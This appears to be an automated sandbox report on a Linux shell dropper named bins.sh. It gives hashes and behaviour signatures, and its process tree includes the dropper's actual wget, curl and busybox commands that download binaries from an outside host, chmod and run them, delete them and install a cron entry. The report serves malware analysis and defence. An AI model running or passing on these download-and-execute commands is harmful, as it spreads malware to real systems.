Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
04-11-2024 14:10
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
ac4bd7b26cb70e05de6c040739c80e6b
-
SHA1
495638d0f71a41f3b65c381017fe8ec29b82d867
-
SHA256
43f1ed363e52f325a84c493dff701237079f014c52d7f0b1f6f93ce032706e15
-
SHA512
3af14ed6345b5cea7eaf6932154d3df50a7094429349f212f7d0dcb80bdf8d5a0bc0efc113f2d112aef4c4f6a50472f003ae7e1798c721c29337412cd617cadf
-
SSDEEP
192:l1FtxGQrzXvIZNW9VxQvPwYUdCSDtx5jXvIZNUVxQvPsYUdCST:l1QQvXvIZNW9VxQvP0XvIZNUVxQvPA
Malware Config
Signatures
-
Contacts a large (1719) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodpid Process 743 chmod 765 chmod 803 chmod 735 chmod -
Executes dropped EXE 4 IoCs
Processes:
sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaFy0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfyupZsoStPpJGJRuy8vG8zOcwIDag4hB5hIvioc pid Process /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr 736 sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF 744 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy 767 y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy /tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv 805 upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv -
Renames itself 1 IoCs
Processes:
upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIvpid Process 806 upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.POM3Ih crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIvdescription ioc Process File opened for reading /proc/933/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/961/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/3/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/13/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/76/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/815/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/839/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/910/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1075/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/9/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/818/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/832/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/848/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1022/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1076/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/21/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/896/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/665/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/960/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/964/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1067/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/868/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/880/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/902/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/973/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1039/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/18/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/36/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/842/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/863/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/864/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/865/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/890/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/897/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/901/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/928/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/972/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/225/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/898/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/906/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1061/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/987/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/24/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/330/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/916/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/982/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/986/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/104/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/460/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/814/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1037/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1079/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/331/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/706/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/835/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/923/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1012/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1020/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/992/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/1051/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/71/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/678/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv File opened for reading /proc/701/cmdline upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv -
System Network Configuration Discovery 1 TTPs 13 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlbusyboxcurlwgetwgetbusyboxwgetcurlbusyboxwgetcurlbusyboxwgetpid Process 717 curl 759 busybox 748 curl 771 wget 707 wget 734 busybox 739 wget 740 curl 742 busybox 747 wget 781 curl 799 busybox 818 wget -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetcurlbusyboxbusyboxbusyboxwgetcurlwgetcurlcurldescription ioc Process File opened for modification /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy busybox File opened for modification /tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv wget File opened for modification /tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv curl File opened for modification /tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv busybox File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF busybox File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr busybox File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF wget File opened for modification /tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF curl File opened for modification /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy wget File opened for modification /tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy curl File opened for modification /tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- System Network Configuration Discovery
PID:707
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734
-
-
/bin/chmodchmod 777 sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr./sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm sHBnnGbWSE4VpL5lkieIJSRTX17DmNrXrr2⤵PID:738
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/bin/chmodchmod 777 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF./0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm 0QiLtaxVhqjie2MrPePSMV1u8SNeuHNLaF2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:759
-
-
/bin/chmodchmod 777 y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy./y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm y0iZGLyQoelM8NhVr0PiXYFm7kSnv2tvfy2⤵PID:770
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:771
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/chmodchmod 777 upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv./upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:805 -
/bin/shsh -c "crontab -l"3⤵PID:807
-
/usr/bin/crontabcrontab -l4⤵PID:809
-
-
-
/bin/shsh -c "crontab -"3⤵PID:810
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:812
-
-
-
-
/bin/rmrm upZsoStPpJGJRuy8vG8zOcwIDag4hB5hIv2⤵PID:815
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u9P7y70JnaiOAmPwjcGdOPUDJpXh3HvJ3F2⤵
- System Network Configuration Discovery
PID:818
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
210B
MD541d98b4367b875f309faf74c0f7a5194
SHA16737cdfea6a43a2baaf464a9767400c2c36f7855
SHA2568cc6bde83a1c4093d210b1b5aa6ad6bda5e277c01d35ab00ad81cacabca664cc
SHA5126ec17ba659857209ddcd124eb97c5a2a57ae2ff4fab75c5c646355ac410bfcb8966e975ddb9666cc8b8591b2326415e9489784905959c734b2268e5c7251b527